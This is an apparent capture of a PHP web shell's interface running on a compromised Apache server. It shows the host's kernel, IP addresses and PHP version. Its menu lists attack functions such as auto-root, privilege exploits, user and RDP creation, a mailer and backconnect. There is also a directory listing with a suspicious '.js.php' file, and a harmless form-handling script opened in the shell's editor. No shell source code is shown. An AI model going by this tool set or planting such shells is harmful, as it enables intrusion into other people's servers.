Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 52.15.113.71
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pgadm /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxrwxrwx
pg
[ DIR ]
drwxrwxrwx
.js.php
3.61
KB
-rw-r--r--
MainPageCompressed.js
341.08
KB
-rwxrwxrwx
add-course.js
11.07
KB
-rwxrwxrwx
admin.js
15.25
KB
-rwxrwxrwx
advanced-form-elements.js
5.41
KB
-rwxrwxrwx
app-status.js
7.38
KB
-rwxrwxrwx
compressed.js
440.45
KB
-rwxrwxrwx
control.js
18.43
KB
-rwxrwxrwx
demo.js
3.33
KB
-rwxrwxrwx
forgot-password.js
3.24
KB
-rwxrwxrwx
form_submit.js
1.3
KB
-rwxrwxrwx
helpers.js
576
B
-rwxrwxrwx
kusPhdAdm.js
50.93
KB
-rwxrwxrwx
kusPhdAdm_03082019.js
45.47
KB
-rwxrwxrwx
kusPhdAdm_04122018.js
30.02
KB
-rwxrwxrwx
kusPhdAdm_12122018.js
45.47
KB
-rwxrwxrwx
kusPhdAdm_17092018.js
29.67
KB
-rwxrwxrwx
kusPhdAdm_23092018.js
29.74
KB
-rwxrwxrwx
login.js
478
B
-rwxrwxrwx
script.js
3
B
-rwxrwxrwx
sign-in.js
4.29
KB
-rwxrwxrwx
sign-up.js
4.52
KB
-rwxrwxrwx
upload.js
5.64
KB
-rwxrwxrwx
upload_18092018.js
5.52
KB
-rwxrwxrwx
validate.js
9.29
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : advanced-form-elements.js
var photo_filename; var sign_filename; $(function () { //$('.colorpicker').colorpicker(); //Dropzone Dropzone.options.frmFileUpload = { paramName: "file", maxFiles: 1, acceptedFiles: ".jpeg,.jpg", resizeWidth: 190, resizeHeight: 220, thumbnailWidth: 190, thumbnailHeight: 220, maxFilesize: 0.2, init: function() { this.on("maxfilesexceeded", function(file){ alert("No more files please!"); }); this.on('success', function(file, response) { photo_filename = response; }); }, addRemoveLinks: true, removedfile: function(file) { photo_filename = undefined; var _ref; return (_ref = file.previewElement) != null ? _ref.parentNode.removeChild(file.previewElement) : void 0; }, resize: function(file) { var resizeInfo = { srcX: 0, srcY: 0, trgX: 0, trgY: 0, srcWidth: file.width, srcHeight: file.height, trgWidth: this.options.thumbnailWidth, trgHeight: this.options.thumbnailHeight }; return resizeInfo; } }; Dropzone.options.signatureUpload = { paramName: "file", maxFiles: 1, acceptedFiles: ".jpeg,.jpg", resizeWidth: 190, resizeHeight: 60, thumbnailWidth: 190, thumbnailHeight: 60, maxFilesize: 0.1, init: function() { this.on("maxfilesexceeded", function(file){ alert("No more files please!"); }); this.on('success', function(file, response) { sign_filename = response; }); }, addRemoveLinks: true, removedfile: function(file) { sign_filename = undefined; var _ref; return (_ref = file.previewElement) != null ? _ref.parentNode.removeChild(file.previewElement) : void 0; }, resize: function(file) { var resizeInfo = { srcX: 0, srcY: 0, trgX: 0, trgY: 0, srcWidth: file.width, srcHeight: file.height, trgWidth: this.options.thumbnailWidth, trgHeight: this.options.thumbnailHeight }; return resizeInfo; } }; //Masked Input ============================================================================================================================ var $demoMaskedInput = $('.demo-masked-input'); //Date $demoMaskedInput.find('.date').inputmask('dd/mm/yyyy', { placeholder: '__/__/____' }); //Time $demoMaskedInput.find('.time12').inputmask('hh:mm t', { placeholder: '__:__ _m', alias: 'time12', hourFormat: '12' }); $demoMaskedInput.find('.time24').inputmask('hh:mm', { placeholder: '__:__ _m', alias: 'time24', hourFormat: '24' }); //Date Time $demoMaskedInput.find('.datetime').inputmask('d/m/y h:s', { placeholder: '__/__/____ __:__', alias: "datetime", hourFormat: '24' }); //Mobile Phone Number $demoMaskedInput.find('.mobile-phone-number').inputmask('+99 (999) 999-99-99', { placeholder: '+__ (___) ___-__-__' }); //Phone Number $demoMaskedInput.find('.phone-number').inputmask('+99 (999) 999-99-99', { placeholder: '+__ (___) ___-__-__' }); //Dollar Money $demoMaskedInput.find('.money-dollar').inputmask('99,99 $', { placeholder: '__,__ $' }); //Euro Money $demoMaskedInput.find('.money-euro').inputmask('99,99 €', { placeholder: '__,__ €' }); //IP Address $demoMaskedInput.find('.ip').inputmask('999.999.999.999', { placeholder: '___.___.___.___' }); //Credit Card $demoMaskedInput.find('.credit-card').inputmask('9999 9999 9999 9999', { placeholder: '____ ____ ____ ____' }); //Email $demoMaskedInput.find('.email').inputmask({ alias: "email" }); //Serial Key $demoMaskedInput.find('.key').inputmask('****-****-****-****', { placeholder: '____-____-____-____' }); //=========================================================================================================================================== //Multi-select /*$('#optgroup').multiSelect({ selectableOptgroup: true }); //noUISlider var sliderBasic = document.getElementById('nouislider_basic_example'); noUiSlider.create(sliderBasic, { start: [30], connect: 'lower', step: 1, range: { 'min': [0], 'max': [100] } }); getNoUISliderValue(sliderBasic, true); //Range Example var rangeSlider = document.getElementById('nouislider_range_example'); noUiSlider.create(rangeSlider, { start: [32500, 62500], connect: true, range: { 'min': 25000, 'max': 100000 } }); getNoUISliderValue(rangeSlider, false);*/ }); //Get noUISlider Value and write on function getNoUISliderValue(slider, percentage) { slider.noUiSlider.on('update', function () { var val = slider.noUiSlider.get(); if (percentage) { val = parseInt(val); val += '%'; } $(slider).parent().find('span.js-nouislider-value').text(val); }); }
Close